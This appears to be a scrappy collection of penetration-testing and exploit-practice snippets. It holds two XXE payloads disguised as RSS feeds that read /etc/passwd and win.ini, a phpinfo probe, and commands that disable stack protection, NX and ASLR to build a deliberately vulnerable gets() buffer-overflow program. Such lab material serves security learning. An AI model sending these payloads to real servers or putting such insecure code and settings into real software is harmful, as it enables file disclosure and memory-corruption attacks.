sl4v

001
002
003
004
005
006
007
008
009
01

sl4v

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
    <title>The Blog</title>
    <link>http://example.com/</link>
    <description>A blog about things</description>
    <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
    <item>

sl4v

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
    <title>The Blog</title>
    <link>http://example.com/</link>
    <description>A blog about things</description>
    <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
    <item>

sl4v

# directory-list-2.3-small.txt
#
# Copyright 2007 James Fisher
#
# This work is licensed under the Creative Commons 
# Attribution-Share Alike 3.0 License. To view a copy of this 
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ 
# or send a letter to Creative Commons, 171 Second Street, 
# Suite 300, San Francisco, California, 94105, USA.
#

sl4v

<?php
phpinfo();
?>

sl4v

How to enable displaying errors in PHP

In script:

ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

In php.ini: display_errors = on

sl4v

Sort and get uniq lines with count

cat txt | sort | uniq -c | sort -nr > out.txt

sl4v

wget https://github.com/radare/radare2/archive/1.3.0.tar.gz
tar xf 1.3.0.tar.gz
cd radare2-1.3.0
sys/install.sh

sl4v

apt install execstack
gcc -m64 -fno-stack-protector -z execstack -o bof bof-gets.c
echo 0 > /proc/sys/kernel/randomize_va_space

sl4v

#include <stdio.h>
int main(int argc, char *argv[]) {
  char buf[256];
  gets(buf);
  printf("You entered: %s\n", buf);
}